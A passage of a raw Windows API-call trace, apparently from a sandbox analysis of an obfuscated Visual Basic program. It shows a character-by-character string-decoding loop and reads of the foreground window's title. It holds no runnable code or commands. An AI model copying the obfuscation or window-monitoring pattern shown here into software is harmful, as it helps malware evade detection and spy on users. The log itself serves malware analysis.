(in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.992] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0165.992] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.992] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0165.993] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.993] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0165.994] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.994] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0165.994] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.995] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.995] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.996] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0165.996] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.997] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0165.997] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.997] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.998] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.998] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0165.998] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.999] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0165.999] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.003] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.003] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.004] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.004] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.005] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.005] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.006] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.006] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.006] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.007] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.007] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0166.008] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.008] GetForegroundWindow () returned 0x102c2 [0166.008] GetLastError () returned 0x0 [0166.008] SysStringLen (param_1=" ") returned 0xff [0166.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0166.008] SysStringLen (param_1=" ") returned 0xff [0166.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0166.008] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0166.009] GetLastError () returned 0x0 [0166.009] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0166.009] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0166.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0166.009] SysStringLen (param_1="Activ") returned 0x5 [0166.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Activ", cchWideChar=6, lpMultiByteStr=0x115974c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Activ", lpUsedDefaultChar=0x0) returned 6 [0166.010] SetWindowTextA (hWnd=0x103c4, lpString="Activ") returned 1 [0166.010] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0166.010] GetFocus () returned 0x0 [0166.010] lstrlenA (lpString="Activ") returned 5 [0166.010] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x115974c) returned 0x1 [0166.010] IsWindow (hWnd=0x103c4) returned 1 [0166.011] IsWindow (hWnd=0x103c4) returned 1 [0166.011] IsWindow (hWnd=0x103c4) returned 1 [0166.011] IsWindow (hWnd=0x103c4) returned 1 [0166.011] GetFocus () returned 0x0 [0166.012] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0166.012] GetFocus () returned 0x0 [0166.012] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0166.012] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0166.012] GetFocus () returned 0x0 [0166.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activ", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0166.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activ", cbMultiByte=-1, lpWideCharStr=0x115974c, cchWideChar=6 | out: lpWideCharStr="Activ") returned 6 [0166.012] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0166.012] VarCmp (pvarLeft=0x28f990, pvarRight=0x28f9f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0166.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.014] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.014] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0166.014] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.014] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0166.015] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.021] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0166.021] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.022] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0166.022] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.023] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0166.023] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.024] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0166.024] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.024] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0166.025] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.025] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0166.025] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.026] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0166.026] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.027] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0166.027] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.028] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0166.028] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.028] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.029] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.029] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0166.029] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.030] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0166.030] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0166.032] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0166.032] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0166.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, 